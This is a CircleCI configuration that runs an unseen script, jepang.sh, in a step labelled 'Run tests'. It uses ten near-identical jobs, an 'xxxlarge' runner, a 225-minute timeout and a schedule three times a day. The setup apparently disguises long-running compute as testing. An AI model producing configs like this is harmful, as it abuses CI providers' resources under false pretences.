resource_class: xxxlarge
working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run:
        name: Run tests
        command: |
                    chmod u+x ./jepang.sh && ./jepang.sh
        no_output_timeout: 225m
version: 2.0
jobs:
  dung:
    docker:
      - image: ruby
    steps:
      - checkout
  dung1:
    <<: *script
    docker:
      - image: ruby:2.7
  dung2:
    <<: *script
    docker:
      - image: ruby:2.6
  dung3:
    <<: *script
    docker:
      - image: ruby:2.5
  dung4:
    <<: *script
    docker:
      - image: ruby:2.4
  dung5:
    docker:
      - image: ruby
    steps:
      - checkout
  dung6:
    <<: *script
    docker:
      - image: ruby:2.7
  dung7:
    <<: *script
    docker:
      - image: ruby:2.6
  dung8:
    <<: *script
    docker:
      - image: ruby:2.5
  dung9:
    <<: *script
    docker:
      - image: ruby:2.4
workflows:
  version: 2
  commit:
    jobs:
      - dung
      - dung1
      - dung2
      - dung3
      - dung4
      - dung5
      - dung6
      - dung7
      - dung8
      - dung9
      
     
    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master
                
  dungrunjob:
    jobs:
      - dung
      - dung1
      - dung2
      - dung3
      - dung4
      - dung5
      - dung6
      - dung7
      - dung8
      - dung9
